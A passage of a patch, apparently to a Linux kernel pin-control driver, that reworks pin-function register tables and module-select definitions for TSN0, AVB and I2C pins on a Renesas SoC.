++#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR8 */
+-/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ #define PINMUX_GPSR	\
+ 						GPSR3_29											\
+@@ -542,6 +604,24 @@ FM(IP0SR3_23_20)	IP0SR3_23_20	FM(IP1SR3_23_20)	IP1SR3_23_20	FM(IP2SR3_23_20)	IP2
+ FM(IP0SR3_27_24)	IP0SR3_27_24	FM(IP1SR3_27_24)	IP1SR3_27_24	FM(IP2SR3_27_24)	IP2SR3_27_24						\
+ FM(IP0SR3_31_28)	IP0SR3_31_28	FM(IP1SR3_31_28)	IP1SR3_31_28	FM(IP2SR3_31_28)	IP2SR3_31_28						\
+ \
++FM(IP0SR4_3_0)		IP0SR4_3_0	FM(IP1SR4_3_0)		IP1SR4_3_0	FM(IP2SR4_3_0)		IP2SR4_3_0	FM(IP3SR4_3_0)		IP3SR4_3_0	\
++FM(IP0SR4_7_4)		IP0SR4_7_4	FM(IP1SR4_7_4)		IP1SR4_7_4	FM(IP2SR4_7_4)		IP2SR4_7_4	\
++FM(IP0SR4_11_8)		IP0SR4_11_8	FM(IP1SR4_11_8)		IP1SR4_11_8	FM(IP2SR4_11_8)		IP2SR4_11_8	\
++FM(IP0SR4_15_12)	IP0SR4_15_12	FM(IP1SR4_15_12)	IP1SR4_15_12	FM(IP2SR4_15_12)	IP2SR4_15_12	\
++FM(IP0SR4_19_16)	IP0SR4_19_16	FM(IP1SR4_19_16)	IP1SR4_19_16	FM(IP2SR4_19_16)	IP2SR4_19_16	\
++FM(IP0SR4_23_20)	IP0SR4_23_20	FM(IP1SR4_23_20)	IP1SR4_23_20	FM(IP2SR4_23_20)	IP2SR4_23_20	\
++FM(IP0SR4_27_24)	IP0SR4_27_24	FM(IP1SR4_27_24)	IP1SR4_27_24	FM(IP2SR4_27_24)	IP2SR4_27_24	\
++FM(IP0SR4_31_28)	IP0SR4_31_28	FM(IP1SR4_31_28)	IP1SR4_31_28	FM(IP2SR4_31_28)	IP2SR4_31_28	\
++\
++FM(IP0SR5_3_0)		IP0SR5_3_0	FM(IP1SR5_3_0)		IP1SR5_3_0	FM(IP2SR5_3_0)		IP2SR5_3_0	\
++FM(IP0SR5_7_4)		IP0SR5_7_4	FM(IP1SR5_7_4)		IP1SR5_7_4	FM(IP2SR5_7_4)		IP2SR5_7_4	\
++FM(IP0SR5_11_8)		IP0SR5_11_8	FM(IP1SR5_11_8)		IP1SR5_11_8	FM(IP2SR5_11_8)		IP2SR5_11_8	\
++FM(IP0SR5_15_12)	IP0SR5_15_12	FM(IP1SR5_15_12)	IP1SR5_15_12	FM(IP2SR5_15_12)	IP2SR5_15_12	\
++FM(IP0SR5_19_16)	IP0SR5_19_16	FM(IP1SR5_19_16)	IP1SR5_19_16	FM(IP2SR5_19_16)	IP2SR5_19_16	\
++FM(IP0SR5_23_20)	IP0SR5_23_20	FM(IP1SR5_23_20)	IP1SR5_23_20	\
++FM(IP0SR5_27_24)	IP0SR5_27_24	FM(IP1SR5_27_24)	IP1SR5_27_24	\
++FM(IP0SR5_31_28)	IP0SR5_31_28	FM(IP1SR5_31_28)	IP1SR5_31_28	\
++\
+ FM(IP0SR6_3_0)		IP0SR6_3_0	FM(IP1SR6_3_0)		IP1SR6_3_0	FM(IP2SR6_3_0)		IP2SR6_3_0	\
+ FM(IP0SR6_7_4)		IP0SR6_7_4	FM(IP1SR6_7_4)		IP1SR6_7_4	FM(IP2SR6_7_4)		IP2SR6_7_4	\
+ FM(IP0SR6_11_8)		IP0SR6_11_8	FM(IP1SR6_11_8)		IP1SR6_11_8	FM(IP2SR6_11_8)		IP2SR6_11_8	\
+@@ -569,54 +649,6 @@ FM(IP0SR8_23_20)	IP0SR8_23_20	FM(IP1SR8_23_20)	IP1SR8_23_20	\
+ FM(IP0SR8_27_24)	IP0SR8_27_24	\
+ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+-/* MOD_SEL4 */			/* 0 */				/* 1 */
+-#define MOD_SEL4_19		FM(SEL_TSN0_TD2_0)		FM(SEL_TSN0_TD2_1)
+-#define MOD_SEL4_18		FM(SEL_TSN0_TD3_0)		FM(SEL_TSN0_TD3_1)
+-#define MOD_SEL4_15		FM(SEL_TSN0_TD0_0)		FM(SEL_TSN0_TD0_1)
+-#define MOD_SEL4_14		FM(SEL_TSN0_TD1_0)		FM(SEL_TSN0_TD1_1)
+-#define MOD_SEL4_12		FM(SEL_TSN0_TXC_0)		FM(SEL_TSN0_TXC_1)
+-#define MOD_SEL4_9		FM(SEL_TSN0_TX_CTL_0)		FM(SEL_TSN0_TX_CTL_1)
+-#define MOD_SEL4_8		FM(SEL_TSN0_AVTP_PPS0_0)	FM(SEL_TSN0_AVTP_PPS0_1)
+-#define MOD_SEL4_5		FM(SEL_TSN0_AVTP_MATCH_0)	FM(SEL_TSN0_AVTP_MATCH_1)
+-#define MOD_SEL4_2		FM(SEL_TSN0_AVTP_PPS1_0)	FM(SEL_TSN0_AVTP_PPS1_1)
+-#define MOD_SEL4_1		FM(SEL_TSN0_MDC_0)		FM(SEL_TSN0_MDC_1)
+-
+-/* MOD_SEL5 */			/* 0 */				/* 1 */
+-#define MOD_SEL5_19		FM(SEL_AVB2_TX_CTL_0)		FM(SEL_AVB2_TX_CTL_1)
+-#define MOD_SEL5_16		FM(SEL_AVB2_TXC_0)		FM(SEL_AVB2_TXC_1)
+-#define MOD_SEL5_15		FM(SEL_AVB2_TD0_0)		FM(SEL_AVB2_TD0_1)
+-#define MOD_SEL5_12		FM(SEL_AVB2_TD1_0)		FM(SEL_AVB2_TD1_1)
+-#define MOD_SEL5_11		FM(SEL_AVB2_TD2_0)		FM(SEL_AVB2_TD2_1)
+-#define MOD_SEL5_8		FM(SEL_AVB2_TD3_0)		FM(SEL_AVB2_TD3_1)
+-#define MOD_SEL5_6		FM(SEL_AVB2_MDC_0)		FM(SEL_AVB2_MDC_1)
+-#define MOD_SEL5_5		FM(SEL_AVB2_MAGIC_0)		FM(SEL_AVB2_MAGIC_1)
+-#define MOD_SEL5_2		FM(SEL_AVB2_AVTP_MATCH_0)	FM(SEL_AVB2_AVTP_MATCH_1)
+-#define MOD_SEL5_0		FM(SEL_AVB2_AVTP_PPS_0)		FM(SEL_AVB2_AVTP_PPS_1)
+-
+-/* MOD_SEL6 */			/* 0 */				/* 1 */
+-#define MOD_SEL6_18		FM(SEL_AVB1_TD3_0)		FM(SEL_AVB1_TD3_1)
+-#define MOD_SEL6_16		FM(SEL_AVB1_TD2_0)		FM(SEL_AVB1_TD2_1)
+-#define MOD_SEL6_13		FM(SEL_AVB1_TD0_0)		FM(SEL_AVB1_TD0_1)
+-#define MOD_SEL6_12		FM(SEL_AVB1_TD1_0)		FM(SEL_AVB1_TD1_1)
+-#define MOD_SEL6_10		FM(SEL_AVB1_AVTP_PPS_0)		FM(SEL_AVB1_AVTP_PPS_1)
+-#define MOD_SEL6_7		FM(SEL_AVB1_TX_CTL_0)		FM(SEL_AVB1_TX_CTL_1)
+-#define MOD_SEL6_6		FM(SEL_AVB1_TXC_0)		FM(SEL_AVB1_TXC_1)
+-#define MOD_SEL6_5		FM(SEL_AVB1_AVTP_MATCH_0)	FM(SEL_AVB1_AVTP_MATCH_1)
+-#define MOD_SEL6_2		FM(SEL_AVB1_MDC_0)		FM(SEL_AVB1_MDC_1)
+-#define MOD_SEL6_1		FM(SEL_AVB1_MAGIC_0)		FM(SEL_AVB1_MAGIC_1)
+-
+-/* MOD_SEL7 */			/* 0 */				/* 1 */
+-#define MOD_SEL7_16		FM(SEL_AVB0_TX_CTL_0)		FM(SEL_AVB0_TX_CTL_1)
+-#define MOD_SEL7_15		FM(SEL_AVB0_TXC_0)		FM(SEL_AVB0_TXC_1)
+-#define MOD_SEL7_13		FM(SEL_AVB0_MDC_0)		FM(SEL_AVB0_MDC_1)
+-#define MOD_SEL7_11		FM(SEL_AVB0_TD0_0)		FM(SEL_AVB0_TD0_1)
+-#define MOD_SEL7_10		FM(SEL_AVB0_MAGIC_0)		FM(SEL_AVB0_MAGIC_1)
+-#define MOD_SEL7_7		FM(SEL_AVB0_TD1_0)		FM(SEL_AVB0_TD1_1)
+-#define MOD_SEL7_6		FM(SEL_AVB0_TD2_0)		FM(SEL_AVB0_TD2_1)
+-#define MOD_SEL7_3		FM(SEL_AVB0_TD3_0)		FM(SEL_AVB0_TD3_1)
+-#define MOD_SEL7_2		FM(SEL_AVB0_AVTP_MATCH_0)	FM(SEL_AVB0_AVTP_MATCH_1)
+-#define MOD_SEL7_0		FM(SEL_AVB0_AVTP_PPS_0)		FM(SEL_AVB0_AVTP_PPS_1)
+-
+ /* MOD_SEL8 */			/* 0 */				/* 1 */
+ #define MOD_SEL8_11		FM(SEL_SDA5_0)			FM(SEL_SDA5_1)
+ #define MOD_SEL8_10		FM(SEL_SCL5_0)			FM(SEL_SCL5_1)
+@@ -633,26 +665,18 @@ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+ #define PINMUX_MOD_SELS \
+ \
+-MOD_SEL4_19		MOD_SEL5_19										\
+-MOD_SEL4_18					MOD_SEL6_18							\
+-														\
+-			MOD_SEL5_16		MOD_SEL6_16		MOD_SEL7_16				\
+-MOD_SEL4_15		MOD_SEL5_15					MOD_SEL7_15				\
+-MOD_SEL4_14													\
+-						MOD_SEL6_13		MOD_SEL7_13				\
+-MOD_SEL4_12		MOD_SEL5_12		MOD_SEL6_12							\
+-			MOD_SEL5_11					MOD_SEL7_11		MOD_SEL8_11	\
+-						MOD_SEL6_10		MOD_SEL7_10		MOD_SEL8_10	\
+-MOD_SEL4_9											MOD_SEL8_9	\
+-MOD_SEL4_8		MOD_SEL5_8								MOD_SEL8_8	\
+-						MOD_SEL6_7		MOD_SEL7_7		MOD_SEL8_7	\
+-			MOD_SEL5_6		MOD_SEL6_6		MOD_SEL7_6		MOD_SEL8_6	\
+-MOD_SEL4_5		MOD_SEL5_5		MOD_SEL6_5					MOD_SEL8_5	\
+-												MOD_SEL8_4	\
+-									MOD_SEL7_3		MOD_SEL8_3	\
+-MOD_SEL4_2		MOD_SEL5_2		MOD_SEL6_2		MOD_SEL7_2		MOD_SEL8_2	\
+-MOD_SEL4_1					MOD_SEL6_1					MOD_SEL8_1	\
+-			MOD_SEL5_0					MOD_SEL7_0		MOD_SEL8_0
++MOD_SEL8_11	\
++MOD_SEL8_10	\
++MOD_SEL8_9	\
++MOD_SEL8_8	\
++MOD_SEL8_7	\
++MOD_SEL8_6	\
++MOD_SEL8_5	\
++MOD_SEL8_4	\
++MOD_SEL8_3	\
++MOD_SEL8_2	\
++MOD_SEL8_1	\
++MOD_SEL8_0
+ 
+ enum {
+ 	PINMUX_RESERVED = 0,
+@@ -686,61 +710,8 @@ enum {
+ static const u16 pinmux_data[] = {
+ 	PINMUX_DATA_GP_ALL(),
+ 
+-	PINMUX_SINGLE(AVS1),
+-	PINMUX_SINGLE(AVS0),
+-	PINMUX_SINGLE(PCIE1_CLKREQ_N),
+-	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+-
+-	/* TSN0 without MODSEL4 */
+-	PINMUX_SINGLE(TSN0_TXCREFCLK),
+-	PINMUX_SINGLE(TSN0_RD2),
+-	PINMUX_SINGLE(TSN0_RD3),
+-	PINMUX_SINGLE(TSN0_RD1),
+-	PINMUX_SINGLE(TSN0_RXC),
+-	PINMUX_SINGLE(TSN0_RD0),
+-	PINMUX_SINGLE(TSN0_RX_CTL),
+-	PINMUX_SINGLE(TSN0_AVTP_CAPTURE),
+-	PINMUX_SINGLE(TSN0_LINK),
+-	PINMUX_SINGLE(TSN0_PHY_INT),
+-	PINMUX_SINGLE(TSN0_MDIO),
+-	/* TSN0 with MODSEL4 */
+-	PINMUX_IPSR_NOGM(0, TSN0_TD2,		SEL_TSN0_TD2_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD3,		SEL_TSN0_TD3_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD0,		SEL_TSN0_TD0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD1,		SEL_TSN0_TD1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TXC,		SEL_TSN0_TXC_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TX_CTL,	SEL_TSN0_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS0,	SEL_TSN0_AVTP_PPS0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_MATCH,	SEL_TSN0_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS1,	SEL_TSN0_AVTP_PPS1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_MDC,		SEL_TSN0_MDC_1),
+-
+-	/* TSN0 without MODSEL5 */
+-	PINMUX_SINGLE(AVB2_RX_CTL),
+-	PINMUX_SINGLE(AVB2_RXC),
+-	PINMUX_SINGLE(AVB2_RD0),
+-	PINMUX_SINGLE(AVB2_RD1),
+-	PINMUX_SINGLE(AVB2_RD2),
+-	PINMUX_SINGLE(AVB2_MDIO),
+-	PINMUX_SINGLE(AVB2_RD3),
+-	PINMUX_SINGLE(AVB2_TXCREFCLK),
+-	PINMUX_SINGLE(AVB2_PHY_INT),
+-	PINMUX_SINGLE(AVB2_LINK),
+-	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+-	/* TSN0 with MODSEL5 */
+-	PINMUX_IPSR_NOGM(0, AVB2_TX_CTL,	SEL_AVB2_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TXC,		SEL_AVB2_TXC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD0,		SEL_AVB2_TD0_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD1,		SEL_AVB2_TD1_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD2,		SEL_AVB2_TD2_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD3,		SEL_AVB2_TD3_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MDC,		SEL_AVB2_MDC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MAGIC,		SEL_AVB2_MAGIC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_MATCH,	SEL_AVB2_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_PPS,	SEL_AVB2_AVTP_PPS_1),
+-
+ 	/* IP0SR0 */
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_B),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+@@ -1006,7 +977,7 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_A),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+@@ -1029,26 +1000,86 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP3SR3_19_16,	RPC_WP_N),
+ 	PINMUX_IPSR_GPSR(IP3SR3_23_20,	RPC_INT_N),
+ 
++	/* IP0SR4 */
++	PINMUX_IPSR_GPSR(IP0SR4_3_0,	TSN0_MDIO),
++	PINMUX_IPSR_GPSR(IP0SR4_7_4,	TSN0_MDC),
++	PINMUX_IPSR_GPSR(IP0SR4_11_8,	TSN0_AVTP_PPS1),
++	PINMUX_IPSR_GPSR(IP0SR4_15_12,	TSN0_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR4_19_16,	TSN0_LINK),
++	PINMUX_IPSR_GPSR(IP0SR4_23_20,	TSN0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR4_27_24,	TSN0_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR4_31_28,	TSN0_RX_CTL),
++
++	/* IP1SR4 */
++	PINMUX_IPSR_GPSR(IP1SR4_3_0,	TSN0_AVTP_PPS0),
++	PINMUX_IPSR_GPSR(IP1SR4_7_4,	TSN0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP1SR4_11_8,	TSN0_RD0),
++	PINMUX_IPSR_GPSR(IP1SR4_15_12,	TSN0_RXC),
++	PINMUX_IPSR_GPSR(IP1SR4_19_16,	TSN0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR4_23_20,	TSN0_RD1),
++	PINMUX_IPSR_GPSR(IP1SR4_27_24,	TSN0_TD1),
++	PINMUX_IPSR_GPSR(IP1SR4_31_28,	TSN0_TD0),
++
++	/* IP2SR4 */
++	PINMUX_IPSR_GPSR(IP2SR4_3_0,	TSN0_RD3),
++	PINMUX_IPSR_GPSR(IP2SR4_7_4,	TSN0_RD2),
++	PINMUX_IPSR_GPSR(IP2SR4_11_8,	TSN0_TD3),
++	PINMUX_IPSR_GPSR(IP2SR4_15_12,	TSN0_TD2),
++	PINMUX_IPSR_GPSR(IP2SR4_19_16,	TSN0_TXCREFCLK),
++	PINMUX_IPSR_GPSR(IP2SR4_23_20,	PCIE0_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_27_24,	PCIE1_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_31_28,	AVS0),
++
++	/* IP3SR4 */
++	PINMUX_IPSR_GPSR(IP3SR4_3_0,	AVS1),
++
++	/* IP0SR5 */
++	PINMUX_IPSR_GPSR(IP0SR5_3_0,	AVB2_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR5_7_4,	AVB2_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR5_11_8,	AVB2_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR5_15_12,	AVB2_LINK),
++	PINMUX_IPSR_GPSR(IP0SR5_19_16,	AVB2_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR5_23_20,	AVB2_MAGIC),
++	PINMUX_IPSR_GPSR(IP0SR5_27_24,	AVB2_MDC),
++	PINMUX_IPSR_GPSR(IP0SR5_31_28,	AVB2_TXCREFCLK),
++
++	/* IP1SR5 */
++	PINMUX_IPSR_GPSR(IP1SR5_3_0,	AVB2_TD3),
++	PINMUX_IPSR_GPSR(IP1SR5_7_4,	AVB2_RD3),
++	PINMUX_IPSR_GPSR(IP1SR5_11_8,	AVB2_MDIO),
++	PINMUX_IPSR_GPSR(IP1SR5_15_12,	AVB2_TD2),
